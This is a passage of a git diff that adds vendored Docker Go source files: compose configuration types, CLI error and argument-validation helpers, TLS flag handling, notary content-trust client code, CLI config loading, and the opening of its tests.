+	"tmpfs",
+	"userns_mode",
+}
+
+// DeprecatedProperties that were removed from the v3 format, but their
+// use should not impact the behaviour of the application.
+var DeprecatedProperties = map[string]string{
+	"container_name": "Setting the container name is not supported.",
+	"expose":         "Exposing ports is unnecessary - services on the same network can access each other's containers on any port.",
+}
+
+// ForbiddenProperties that are not supported in this implementation of the
+// compose file.
+var ForbiddenProperties = map[string]string{
+	"extends":       "Support for `extends` is not implemented yet. Use `docker-compose config` to generate a configuration with all `extends` options resolved, and deploy from that.",
+	"volume_driver": "Instead of setting the volume driver on the service, define a volume using the top-level `volumes` option and specify the driver there.",
+	"volumes_from":  "To share a volume between services, define it using the top-level `volumes` option and reference it from each service that shares it using the service-level `volumes` option.",
+	"cpu_quota":     "Set resource limits using deploy.resources",
+	"cpu_shares":    "Set resource limits using deploy.resources",
+	"cpuset":        "Set resource limits using deploy.resources",
+	"mem_limit":     "Set resource limits using deploy.resources",
+	"memswap_limit": "Set resource limits using deploy.resources",
+}
+
+// Dict is a mapping of strings to interface{}
+type Dict map[string]interface{}
+
+// ConfigFile is a filename and the contents of the file as a Dict
+type ConfigFile struct {
+	Filename string
+	Config   Dict
+}
+
+// ConfigDetails are the details about a group of ConfigFiles
+type ConfigDetails struct {
+	WorkingDir  string
+	ConfigFiles []ConfigFile
+	Environment map[string]string
+}
+
+// Config is a full compose file configuration
+type Config struct {
+	Services []ServiceConfig
+	Networks map[string]NetworkConfig
+	Volumes  map[string]VolumeConfig
+	Secrets  map[string]SecretConfig
+}
+
+// ServiceConfig is the configuration of one service
+type ServiceConfig struct {
+	Name string
+
+	CapAdd          []string `mapstructure:"cap_add"`
+	CapDrop         []string `mapstructure:"cap_drop"`
+	CgroupParent    string   `mapstructure:"cgroup_parent"`
+	Command         []string `compose:"shell_command"`
+	ContainerName   string   `mapstructure:"container_name"`
+	DependsOn       []string `mapstructure:"depends_on"`
+	Deploy          DeployConfig
+	Devices         []string
+	DNS             []string          `compose:"string_or_list"`
+	DNSSearch       []string          `mapstructure:"dns_search" compose:"string_or_list"`
+	DomainName      string            `mapstructure:"domainname"`
+	Entrypoint      []string          `compose:"shell_command"`
+	Environment     map[string]string `compose:"list_or_dict_equals"`
+	Expose          []string          `compose:"list_of_strings_or_numbers"`
+	ExternalLinks   []string          `mapstructure:"external_links"`
+	ExtraHosts      map[string]string `mapstructure:"extra_hosts" compose:"list_or_dict_colon"`
+	Hostname        string
+	HealthCheck     *HealthCheckConfig
+	Image           string
+	Ipc             string
+	Labels          map[string]string `compose:"list_or_dict_equals"`
+	Links           []string
+	Logging         *LoggingConfig
+	MacAddress      string                           `mapstructure:"mac_address"`
+	NetworkMode     string                           `mapstructure:"network_mode"`
+	Networks        map[string]*ServiceNetworkConfig `compose:"list_or_struct_map"`
+	Pid             string
+	Ports           []string `compose:"list_of_strings_or_numbers"`
+	Privileged      bool
+	ReadOnly        bool `mapstructure:"read_only"`
+	Restart         string
+	Secrets         []ServiceSecretConfig
+	SecurityOpt     []string       `mapstructure:"security_opt"`
+	StdinOpen       bool           `mapstructure:"stdin_open"`
+	StopGracePeriod *time.Duration `mapstructure:"stop_grace_period"`
+	StopSignal      string         `mapstructure:"stop_signal"`
+	Tmpfs           []string       `compose:"string_or_list"`
+	Tty             bool           `mapstructure:"tty"`
+	Ulimits         map[string]*UlimitsConfig
+	User            string
+	Volumes         []string
+	WorkingDir      string `mapstructure:"working_dir"`
+}
+
+// LoggingConfig the logging configuration for a service
+type LoggingConfig struct {
+	Driver  string
+	Options map[string]string
+}
+
+// DeployConfig the deployment configuration for a service
+type DeployConfig struct {
+	Mode          string
+	Replicas      *uint64
+	Labels        map[string]string `compose:"list_or_dict_equals"`
+	UpdateConfig  *UpdateConfig     `mapstructure:"update_config"`
+	Resources     Resources
+	RestartPolicy *RestartPolicy `mapstructure:"restart_policy"`
+	Placement     Placement
+}
+
+// HealthCheckConfig the healthcheck configuration for a service
+type HealthCheckConfig struct {
+	Test     []string `compose:"healthcheck"`
+	Timeout  string
+	Interval string
+	Retries  *uint64
+	Disable  bool
+}
+
+// UpdateConfig the service update configuration
+type UpdateConfig struct {
+	Parallelism     *uint64
+	Delay           time.Duration
+	FailureAction   string `mapstructure:"failure_action"`
+	Monitor         time.Duration
+	MaxFailureRatio float32 `mapstructure:"max_failure_ratio"`
+}
+
+// Resources the resource limits and reservations
+type Resources struct {
+	Limits       *Resource
+	Reservations *Resource
+}
+
+// Resource is a resource to be limited or reserved
+type Resource struct {
+	// TODO: types to convert from units and ratios
+	NanoCPUs    string    `mapstructure:"cpus"`
+	MemoryBytes UnitBytes `mapstructure:"memory"`
+}
+
+// UnitBytes is the bytes type
+type UnitBytes int64
+
+// RestartPolicy the service restart policy
+type RestartPolicy struct {
+	Condition   string
+	Delay       *time.Duration
+	MaxAttempts *uint64 `mapstructure:"max_attempts"`
+	Window      *time.Duration
+}
+
+// Placement constraints for the service
+type Placement struct {
+	Constraints []string
+}
+
+// ServiceNetworkConfig is the network configuration for a service
+type ServiceNetworkConfig struct {
+	Aliases     []string
+	Ipv4Address string `mapstructure:"ipv4_address"`
+	Ipv6Address string `mapstructure:"ipv6_address"`
+}
+
+// ServiceSecretConfig is the secret configuration for a service
+type ServiceSecretConfig struct {
+	Source string
+	Target string
+	UID    string
+	GID    string
+	Mode   uint32
+}
+
+// UlimitsConfig the ulimit configuration
+type UlimitsConfig struct {
+	Single int
+	Soft   int
+	Hard   int
+}
+
+// NetworkConfig for a network
+type NetworkConfig struct {
+	Driver     string
+	DriverOpts map[string]string `mapstructure:"driver_opts"`
+	Ipam       IPAMConfig
+	External   External
+	Internal   bool
+	Labels     map[string]string `compose:"list_or_dict_equals"`
+}
+
+// IPAMConfig for a network
+type IPAMConfig struct {
+	Driver string
+	Config []*IPAMPool
+}
+
+// IPAMPool for a network
+type IPAMPool struct {
+	Subnet string
+}
+
+// VolumeConfig for a volume
+type VolumeConfig struct {
+	Driver     string
+	DriverOpts map[string]string `mapstructure:"driver_opts"`
+	External   External
+	Labels     map[string]string `compose:"list_or_dict_equals"`
+}
+
+// External identifies a Volume or Network as a reference to a resource that is
+// not managed, and should already exist.
+type External struct {
+	Name     string
+	External bool
+}
+
+// SecretConfig for a secret
+type SecretConfig struct {
+	File     string
+	External External
+	Labels   map[string]string `compose:"list_or_dict_equals"`
+}
diff --git a/vendor/github.com/docker/docker/cli/error.go b/vendor/github.com/docker/docker/cli/error.go
new file mode 100644
index 0000000000..62f62433b8
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/error.go
@@ -0,0 +1,33 @@
+package cli
+
+import (
+	"fmt"
+	"strings"
+)
+
+// Errors is a list of errors.
+// Useful in a loop if you don't want to return the error right away and you want to display after the loop,
+// all the errors that happened during the loop.
+type Errors []error
+
+func (errList Errors) Error() string {
+	if len(errList) < 1 {
+		return ""
+	}
+
+	out := make([]string, len(errList))
+	for i := range errList {
+		out[i] = errList[i].Error()
+	}
+	return strings.Join(out, ", ")
+}
+
+// StatusError reports an unsuccessful exit by a command.
+type StatusError struct {
+	Status     string
+	StatusCode int
+}
+
+func (e StatusError) Error() string {
+	return fmt.Sprintf("Status: %s, Code: %d", e.Status, e.StatusCode)
+}
diff --git a/vendor/github.com/docker/docker/cli/flags/client.go b/vendor/github.com/docker/docker/cli/flags/client.go
new file mode 100644
index 0000000000..9b6940f6bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/flags/client.go
@@ -0,0 +1,13 @@
+package flags
+
+// ClientOptions are the options used to configure the client cli
+type ClientOptions struct {
+	Common    *CommonOptions
+	ConfigDir string
+	Version   bool
+}
+
+// NewClientOptions returns a new ClientOptions
+func NewClientOptions() *ClientOptions {
+	return &ClientOptions{Common: NewCommonOptions()}
+}
diff --git a/vendor/github.com/docker/docker/cli/flags/common.go b/vendor/github.com/docker/docker/cli/flags/common.go
new file mode 100644
index 0000000000..e2f9da0732
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/flags/common.go
@@ -0,0 +1,120 @@
+package flags
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/opts"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/spf13/pflag"
+)
+
+const (
+	// DefaultTrustKeyFile is the default filename for the trust key
+	DefaultTrustKeyFile = "key.json"
+	// DefaultCaFile is the default filename for the CA pem file
+	DefaultCaFile = "ca.pem"
+	// DefaultKeyFile is the default filename for the key pem file
+	DefaultKeyFile = "key.pem"
+	// DefaultCertFile is the default filename for the cert pem file
+	DefaultCertFile = "cert.pem"
+	// FlagTLSVerify is the flag name for the tls verification option
+	FlagTLSVerify = "tlsverify"
+)
+
+var (
+	dockerCertPath  = os.Getenv("DOCKER_CERT_PATH")
+	dockerTLSVerify = os.Getenv("DOCKER_TLS_VERIFY") != ""
+)
+
+// CommonOptions are options common to both the client and the daemon.
+type CommonOptions struct {
+	Debug      bool
+	Hosts      []string
+	LogLevel   string
+	TLS        bool
+	TLSVerify  bool
+	TLSOptions *tlsconfig.Options
+	TrustKey   string
+}
+
+// NewCommonOptions returns a new CommonOptions
+func NewCommonOptions() *CommonOptions {
+	return &CommonOptions{}
+}
+
+// InstallFlags adds flags for the common options on the FlagSet
+func (commonOpts *CommonOptions) InstallFlags(flags *pflag.FlagSet) {
+	if dockerCertPath == "" {
+		dockerCertPath = cliconfig.ConfigDir()
+	}
+
+	flags.BoolVarP(&commonOpts.Debug, "debug", "D", false, "Enable debug mode")
+	flags.StringVarP(&commonOpts.LogLevel, "log-level", "l", "info", "Set the logging level (\"debug\", \"info\", \"warn\", \"error\", \"fatal\")")
+	flags.BoolVar(&commonOpts.TLS, "tls", false, "Use TLS; implied by --tlsverify")
+	flags.BoolVar(&commonOpts.TLSVerify, FlagTLSVerify, dockerTLSVerify, "Use TLS and verify the remote")
+
+	// TODO use flag flags.String("identity"}, "i", "", "Path to libtrust key file")
+
+	commonOpts.TLSOptions = &tlsconfig.Options{
+		CAFile:   filepath.Join(dockerCertPath, DefaultCaFile),
+		CertFile: filepath.Join(dockerCertPath, DefaultCertFile),
+		KeyFile:  filepath.Join(dockerCertPath, DefaultKeyFile),
+	}
+	tlsOptions := commonOpts.TLSOptions
+	flags.Var(opts.NewQuotedString(&tlsOptions.CAFile), "tlscacert", "Trust certs signed only by this CA")
+	flags.Var(opts.NewQuotedString(&tlsOptions.CertFile), "tlscert", "Path to TLS certificate file")
+	flags.Var(opts.NewQuotedString(&tlsOptions.KeyFile), "tlskey", "Path to TLS key file")
+
+	hostOpt := opts.NewNamedListOptsRef("hosts", &commonOpts.Hosts, opts.ValidateHost)
+	flags.VarP(hostOpt, "host", "H", "Daemon socket(s) to connect to")
+}
+
+// SetDefaultOptions sets default values for options after flag parsing is
+// complete
+func (commonOpts *CommonOptions) SetDefaultOptions(flags *pflag.FlagSet) {
+	// Regardless of whether the user sets it to true or false, if they
+	// specify --tlsverify at all then we need to turn on tls
+	// TLSVerify can be true even if not set due to DOCKER_TLS_VERIFY env var, so we need
+	// to check that here as well
+	if flags.Changed(FlagTLSVerify) || commonOpts.TLSVerify {
+		commonOpts.TLS = true
+	}
+
+	if !commonOpts.TLS {
+		commonOpts.TLSOptions = nil
+	} else {
+		tlsOptions := commonOpts.TLSOptions
+		tlsOptions.InsecureSkipVerify = !commonOpts.TLSVerify
+
+		// Reset CertFile and KeyFile to empty string if the user did not specify
+		// the respective flags and the respective default files were not found.
+		if !flags.Changed("tlscert") {
+			if _, err := os.Stat(tlsOptions.CertFile); os.IsNotExist(err) {
+				tlsOptions.CertFile = ""
+			}
+		}
+		if !flags.Changed("tlskey") {
+			if _, err := os.Stat(tlsOptions.KeyFile); os.IsNotExist(err) {
+				tlsOptions.KeyFile = ""
+			}
+		}
+	}
+}
+
+// SetLogLevel sets the logrus logging level
+func SetLogLevel(logLevel string) {
+	if logLevel != "" {
+		lvl, err := logrus.ParseLevel(logLevel)
+		if err != nil {
+			fmt.Fprintf(os.Stderr, "Unable to parse logging level: %s\n", logLevel)
+			os.Exit(1)
+		}
+		logrus.SetLevel(lvl)
+	} else {
+		logrus.SetLevel(logrus.InfoLevel)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/flags/common_test.go b/vendor/github.com/docker/docker/cli/flags/common_test.go
new file mode 100644
index 0000000000..81eaa38f43
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/flags/common_test.go
@@ -0,0 +1,42 @@
+package flags
+
+import (
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/pkg/testutil/assert"
+	"github.com/spf13/pflag"
+)
+
+func TestCommonOptionsInstallFlags(t *testing.T) {
+	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
+	opts := NewCommonOptions()
+	opts.InstallFlags(flags)
+
+	err := flags.Parse([]string{
+		"--tlscacert=\"/foo/cafile\"",
+		"--tlscert=\"/foo/cert\"",
+		"--tlskey=\"/foo/key\"",
+	})
+	assert.NilError(t, err)
+	assert.Equal(t, opts.TLSOptions.CAFile, "/foo/cafile")
+	assert.Equal(t, opts.TLSOptions.CertFile, "/foo/cert")
+	assert.Equal(t, opts.TLSOptions.KeyFile, "/foo/key")
+}
+
+func defaultPath(filename string) string {
+	return filepath.Join(cliconfig.ConfigDir(), filename)
+}
+
+func TestCommonOptionsInstallFlagsWithDefaults(t *testing.T) {
+	flags := pflag.NewFlagSet("testing", pflag.ContinueOnError)
+	opts := NewCommonOptions()
+	opts.InstallFlags(flags)
+
+	err := flags.Parse([]string{})
+	assert.NilError(t, err)
+	assert.Equal(t, opts.TLSOptions.CAFile, defaultPath("ca.pem"))
+	assert.Equal(t, opts.TLSOptions.CertFile, defaultPath("cert.pem"))
+	assert.Equal(t, opts.TLSOptions.KeyFile, defaultPath("key.pem"))
+}
diff --git a/vendor/github.com/docker/docker/cli/required.go b/vendor/github.com/docker/docker/cli/required.go
new file mode 100644
index 0000000000..8ee02c8429
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/required.go
@@ -0,0 +1,96 @@
+package cli
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/spf13/cobra"
+)
+
+// NoArgs validates args and returns an error if there are any args
+func NoArgs(cmd *cobra.Command, args []string) error {
+	if len(args) == 0 {
+		return nil
+	}
+
+	if cmd.HasSubCommands() {
+		return fmt.Errorf("\n" + strings.TrimRight(cmd.UsageString(), "\n"))
+	}
+
+	return fmt.Errorf(
+		"\"%s\" accepts no argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+		cmd.CommandPath(),
+		cmd.CommandPath(),
+		cmd.UseLine(),
+		cmd.Short,
+	)
+}
+
+// RequiresMinArgs returns an error if there is not at least min args
+func RequiresMinArgs(min int) cobra.PositionalArgs {
+	return func(cmd *cobra.Command, args []string) error {
+		if len(args) >= min {
+			return nil
+		}
+		return fmt.Errorf(
+			"\"%s\" requires at least %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+			cmd.CommandPath(),
+			min,
+			cmd.CommandPath(),
+			cmd.UseLine(),
+			cmd.Short,
+		)
+	}
+}
+
+// RequiresMaxArgs returns an error if there is not at most max args
+func RequiresMaxArgs(max int) cobra.PositionalArgs {
+	return func(cmd *cobra.Command, args []string) error {
+		if len(args) <= max {
+			return nil
+		}
+		return fmt.Errorf(
+			"\"%s\" requires at most %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+			cmd.CommandPath(),
+			max,
+			cmd.CommandPath(),
+			cmd.UseLine(),
+			cmd.Short,
+		)
+	}
+}
+
+// RequiresRangeArgs returns an error if there is not at least min args and at most max args
+func RequiresRangeArgs(min int, max int) cobra.PositionalArgs {
+	return func(cmd *cobra.Command, args []string) error {
+		if len(args) >= min && len(args) <= max {
+			return nil
+		}
+		return fmt.Errorf(
+			"\"%s\" requires at least %d and at most %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+			cmd.CommandPath(),
+			min,
+			max,
+			cmd.CommandPath(),
+			cmd.UseLine(),
+			cmd.Short,
+		)
+	}
+}
+
+// ExactArgs returns an error if there is not the exact number of args
+func ExactArgs(number int) cobra.PositionalArgs {
+	return func(cmd *cobra.Command, args []string) error {
+		if len(args) == number {
+			return nil
+		}
+		return fmt.Errorf(
+			"\"%s\" requires exactly %d argument(s).\nSee '%s --help'.\n\nUsage:  %s\n\n%s",
+			cmd.CommandPath(),
+			number,
+			cmd.CommandPath(),
+			cmd.UseLine(),
+			cmd.Short,
+		)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/trust/trust.go b/vendor/github.com/docker/docker/cli/trust/trust.go
new file mode 100644
index 0000000000..51914f74b0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/trust/trust.go
@@ -0,0 +1,232 @@
+package trust
+
+import (
+	"encoding/json"
+	"fmt"
+	"net"
+	"net/http"
+	"net/url"
+	"os"
+	"path"
+	"path/filepath"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/registry/client/auth"
+	"github.com/docker/distribution/registry/client/auth/challenge"
+	"github.com/docker/distribution/registry/client/transport"
+	"github.com/docker/docker/api/types"
+	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/registry"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/docker/notary"
+	"github.com/docker/notary/client"
+	"github.com/docker/notary/passphrase"
+	"github.com/docker/notary/storage"
+	"github.com/docker/notary/trustmanager"
+	"github.com/docker/notary/trustpinning"
+	"github.com/docker/notary/tuf/data"
+	"github.com/docker/notary/tuf/signed"
+)
+
+var (
+	// ReleasesRole is the role named "releases"
+	ReleasesRole = path.Join(data.CanonicalTargetsRole, "releases")
+)
+
+func trustDirectory() string {
+	return filepath.Join(cliconfig.ConfigDir(), "trust")
+}
+
+// certificateDirectory returns the directory containing
+// TLS certificates for the given server. An error is
+// returned if there was an error parsing the server string.
+func certificateDirectory(server string) (string, error) {
+	u, err := url.Parse(server)
+	if err != nil {
+		return "", err
+	}
+
+	return filepath.Join(cliconfig.ConfigDir(), "tls", u.Host), nil
+}
+
+// Server returns the base URL for the trust server.
+func Server(index *registrytypes.IndexInfo) (string, error) {
+	if s := os.Getenv("DOCKER_CONTENT_TRUST_SERVER"); s != "" {
+		urlObj, err := url.Parse(s)
+		if err != nil || urlObj.Scheme != "https" {
+			return "", fmt.Errorf("valid https URL required for trust server, got %s", s)
+		}
+
+		return s, nil
+	}
+	if index.Official {
+		return registry.NotaryServer, nil
+	}
+	return "https://" + index.Name, nil
+}
+
+type simpleCredentialStore struct {
+	auth types.AuthConfig
+}
+
+func (scs simpleCredentialStore) Basic(u *url.URL) (string, string) {
+	return scs.auth.Username, scs.auth.Password
+}
+
+func (scs simpleCredentialStore) RefreshToken(u *url.URL, service string) string {
+	return scs.auth.IdentityToken
+}
+
+func (scs simpleCredentialStore) SetRefreshToken(*url.URL, string, string) {
+}
+
+// GetNotaryRepository returns a NotaryRepository which stores all the
+// information needed to operate on a notary repository.
+// It creates an HTTP transport providing authentication support.
+func GetNotaryRepository(streams command.Streams, repoInfo *registry.RepositoryInfo, authConfig types.AuthConfig, actions ...string) (*client.NotaryRepository, error) {
+	server, err := Server(repoInfo.Index)
+	if err != nil {
+		return nil, err
+	}
+
+	var cfg = tlsconfig.ClientDefault()
+	cfg.InsecureSkipVerify = !repoInfo.Index.Secure
+
+	// Get certificate base directory
+	certDir, err := certificateDirectory(server)
+	if err != nil {
+		return nil, err
+	}
+	logrus.Debugf("reading certificate directory: %s", certDir)
+
+	if err := registry.ReadCertsDirectory(cfg, certDir); err != nil {
+		return nil, err
+	}
+
+	base := &http.Transport{
+		Proxy: http.ProxyFromEnvironment,
+		Dial: (&net.Dialer{
+			Timeout:   30 * time.Second,
+			KeepAlive: 30 * time.Second,
+			DualStack: true,
+		}).Dial,
+		TLSHandshakeTimeout: 10 * time.Second,
+		TLSClientConfig:     cfg,
+		DisableKeepAlives:   true,
+	}
+
+	// Skip configuration headers since request is not going to Docker daemon
+	modifiers := registry.DockerHeaders(command.UserAgent(), http.Header{})
+	authTransport := transport.NewTransport(base, modifiers...)
+	pingClient := &http.Client{
+		Transport: authTransport,
+		Timeout:   5 * time.Second,
+	}
+	endpointStr := server + "/v2/"
+	req, err := http.NewRequest("GET", endpointStr, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	challengeManager := challenge.NewSimpleManager()
+
+	resp, err := pingClient.Do(req)
+	if err != nil {
+		// Ignore error on ping to operate in offline mode
+		logrus.Debugf("Error pinging notary server %q: %s", endpointStr, err)
+	} else {
+		defer resp.Body.Close()
+
+		// Add response to the challenge manager to parse out
+		// authentication header and register authentication method
+		if err := challengeManager.AddResponse(resp); err != nil {
+			return nil, err
+		}
+	}
+
+	scope := auth.RepositoryScope{
+		Repository: repoInfo.FullName(),
+		Actions:    actions,
+		Class:      repoInfo.Class,
+	}
+	creds := simpleCredentialStore{auth: authConfig}
+	tokenHandlerOptions := auth.TokenHandlerOptions{
+		Transport:   authTransport,
+		Credentials: creds,
+		Scopes:      []auth.Scope{scope},
+		ClientID:    registry.AuthClientID,
+	}
+	tokenHandler := auth.NewTokenHandlerWithOptions(tokenHandlerOptions)
+	basicHandler := auth.NewBasicHandler(creds)
+	modifiers = append(modifiers, transport.RequestModifier(auth.NewAuthorizer(challengeManager, tokenHandler, basicHandler)))
+	tr := transport.NewTransport(base, modifiers...)
+
+	return client.NewNotaryRepository(
+		trustDirectory(),
+		repoInfo.FullName(),
+		server,
+		tr,
+		getPassphraseRetriever(streams),
+		trustpinning.TrustPinConfig{})
+}
+
+func getPassphraseRetriever(streams command.Streams) notary.PassRetriever {
+	aliasMap := map[string]string{
+		"root":     "root",
+		"snapshot": "repository",
+		"targets":  "repository",
+		"default":  "repository",
+	}
+	baseRetriever := passphrase.PromptRetrieverWithInOut(streams.In(), streams.Out(), aliasMap)
+	env := map[string]string{
+		"root":     os.Getenv("DOCKER_CONTENT_TRUST_ROOT_PASSPHRASE"),
+		"snapshot": os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
+		"targets":  os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
+		"default":  os.Getenv("DOCKER_CONTENT_TRUST_REPOSITORY_PASSPHRASE"),
+	}
+
+	return func(keyName string, alias string, createNew bool, numAttempts int) (string, bool, error) {
+		if v := env[alias]; v != "" {
+			return v, numAttempts > 1, nil
+		}
+		// For non-root roles, we can also try the "default" alias if it is specified
+		if v := env["default"]; v != "" && alias != data.CanonicalRootRole {
+			return v, numAttempts > 1, nil
+		}
+		return baseRetriever(keyName, alias, createNew, numAttempts)
+	}
+}
+
+// NotaryError formats an error message received from the notary service
+func NotaryError(repoName string, err error) error {
+	switch err.(type) {
+	case *json.SyntaxError:
+		logrus.Debugf("Notary syntax error: %s", err)
+		return fmt.Errorf("Error: no trust data available for remote repository %s. Try running notary server and setting DOCKER_CONTENT_TRUST_SERVER to its HTTPS address?", repoName)
+	case signed.ErrExpired:
+		return fmt.Errorf("Error: remote repository %s out-of-date: %v", repoName, err)
+	case trustmanager.ErrKeyNotFound:
+		return fmt.Errorf("Error: signing keys for remote repository %s not found: %v", repoName, err)
+	case storage.NetworkError:
+		return fmt.Errorf("Error: error contacting notary server: %v", err)
+	case storage.ErrMetaNotFound:
+		return fmt.Errorf("Error: trust data missing for remote repository %s or remote repository not found: %v", repoName, err)
+	case trustpinning.ErrRootRotationFail, trustpinning.ErrValidationFail, signed.ErrInvalidKeyType:
+		return fmt.Errorf("Warning: potential malicious behavior - trust data mismatch for remote repository %s: %v", repoName, err)
+	case signed.ErrNoKeys:
+		return fmt.Errorf("Error: could not find signing keys for remote repository %s, or could not decrypt signing key: %v", repoName, err)
+	case signed.ErrLowVersion:
+		return fmt.Errorf("Warning: potential malicious behavior - trust data version is lower than expected for remote repository %s: %v", repoName, err)
+	case signed.ErrRoleThreshold:
+		return fmt.Errorf("Warning: potential malicious behavior - trust data has insufficient signatures for remote repository %s: %v", repoName, err)
+	case client.ErrRepositoryNotExist:
+		return fmt.Errorf("Error: remote trust data does not exist for %s: %v", repoName, err)
+	case signed.ErrInsufficientSignatures:
+		return fmt.Errorf("Error: could not produce valid signature for %s.  If Yubikey was used, was touch input provided?: %v", repoName, err)
+	}
+
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/config.go b/vendor/github.com/docker/docker/cliconfig/config.go
new file mode 100644
index 0000000000..d81bf86b7a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/config.go
@@ -0,0 +1,120 @@
+package cliconfig
+
+import (
+	"fmt"
+	"io"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cliconfig/configfile"
+	"github.com/docker/docker/pkg/homedir"
+)
+
+const (
+	// ConfigFileName is the name of config file
+	ConfigFileName = "config.json"
+	configFileDir  = ".docker"
+	oldConfigfile  = ".dockercfg"
+)
+
+var (
+	configDir = os.Getenv("DOCKER_CONFIG")
+)
+
+func init() {
+	if configDir == "" {
+		configDir = filepath.Join(homedir.Get(), configFileDir)
+	}
+}
+
+// ConfigDir returns the directory the configuration file is stored in
+func ConfigDir() string {
+	return configDir
+}
+
+// SetConfigDir sets the directory the configuration file is stored in
+func SetConfigDir(dir string) {
+	configDir = dir
+}
+
+// NewConfigFile initializes an empty configuration file for the given filename 'fn'
+func NewConfigFile(fn string) *configfile.ConfigFile {
+	return &configfile.ConfigFile{
+		AuthConfigs: make(map[string]types.AuthConfig),
+		HTTPHeaders: make(map[string]string),
+		Filename:    fn,
+	}
+}
+
+// LegacyLoadFromReader is a convenience function that creates a ConfigFile object from
+// a non-nested reader
+func LegacyLoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) {
+	configFile := configfile.ConfigFile{
+		AuthConfigs: make(map[string]types.AuthConfig),
+	}
+	err := configFile.LegacyLoadFromReader(configData)
+	return &configFile, err
+}
+
+// LoadFromReader is a convenience function that creates a ConfigFile object from
+// a reader
+func LoadFromReader(configData io.Reader) (*configfile.ConfigFile, error) {
+	configFile := configfile.ConfigFile{
+		AuthConfigs: make(map[string]types.AuthConfig),
+	}
+	err := configFile.LoadFromReader(configData)
+	return &configFile, err
+}
+
+// Load reads the configuration files in the given directory, and sets up
+// the auth config information and returns values.
+// FIXME: use the internal golang config parser
+func Load(configDir string) (*configfile.ConfigFile, error) {
+	if configDir == "" {
+		configDir = ConfigDir()
+	}
+
+	configFile := configfile.ConfigFile{
+		AuthConfigs: make(map[string]types.AuthConfig),
+		Filename:    filepath.Join(configDir, ConfigFileName),
+	}
+
+	// Try happy path first - latest config file
+	if _, err := os.Stat(configFile.Filename); err == nil {
+		file, err := os.Open(configFile.Filename)
+		if err != nil {
+			return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err)
+		}
+		defer file.Close()
+		err = configFile.LoadFromReader(file)
+		if err != nil {
+			err = fmt.Errorf("%s - %v", configFile.Filename, err)
+		}
+		return &configFile, err
+	} else if !os.IsNotExist(err) {
+		// if file is there but we can't stat it for any reason other
+		// than it doesn't exist then stop
+		return &configFile, fmt.Errorf("%s - %v", configFile.Filename, err)
+	}
+
+	// Can't find latest config file so check for the old one
+	confFile := filepath.Join(homedir.Get(), oldConfigfile)
+	if _, err := os.Stat(confFile); err != nil {
+		return &configFile, nil //missing file is not an error
+	}
+	file, err := os.Open(confFile)
+	if err != nil {
+		return &configFile, fmt.Errorf("%s - %v", confFile, err)
+	}
+	defer file.Close()
+	err = configFile.LegacyLoadFromReader(file)
+	if err != nil {
+		return &configFile, fmt.Errorf("%s - %v", confFile, err)
+	}
+
+	if configFile.HTTPHeaders == nil {
+		configFile.HTTPHeaders = map[string]string{}
+	}
+	return &configFile, nil
+}
diff --git a/vendor/github.com/docker/docker/cliconfig/config_test.go b/vendor/github.com/docker/docker/cliconfig/config_test.go
new file mode 100644
index 0000000000..d8a099ab58
--- /dev/null
+++ b/vendor/github.com/docker/docker/cliconfig/config_test.go
@@ -0,0 +1,621 @@
+package cliconfig
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/cliconfig/configfile"
+	"github.com/docker/docker/pkg/homedir"
+)
+
+func TestEmptyConfigDir(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	SetConfigDir(tmpHome)
+
+	config, err := Load("")
+	if err != nil {
+		t.Fatalf("Failed loading on empty config dir: %q", err)
+	}
+
+	expectedConfigFilename := filepath.Join(tmpHome, ConfigFileName)
+	if config.Filename != expectedConfigFilename {
+		t.Fatalf("Expected config filename %s, got %s", expectedConfigFilename, config.Filename)
+	}
+
+	// Now save it and make sure it shows up in new form
+	saveConfigAndValidateNewFormat(t, config, tmpHome)
+}
+
+func TestMissingFile(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	config, err := Load(tmpHome)
+	if err != nil {
+		t.Fatalf("Failed loading on missing file: %q", err)
+	}
+
+	// Now save it and make sure it shows up in new form
+	saveConfigAndValidateNewFormat(t, config, tmpHome)
+}
+
+func TestSaveFileToDirs(t *testing.T) {
+	tmpHome, err := ioutil.TempDir("", "config-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tmpHome)
+
+	tmpHome += "/.docker"
+
+	config, err := Load(tmpHome)
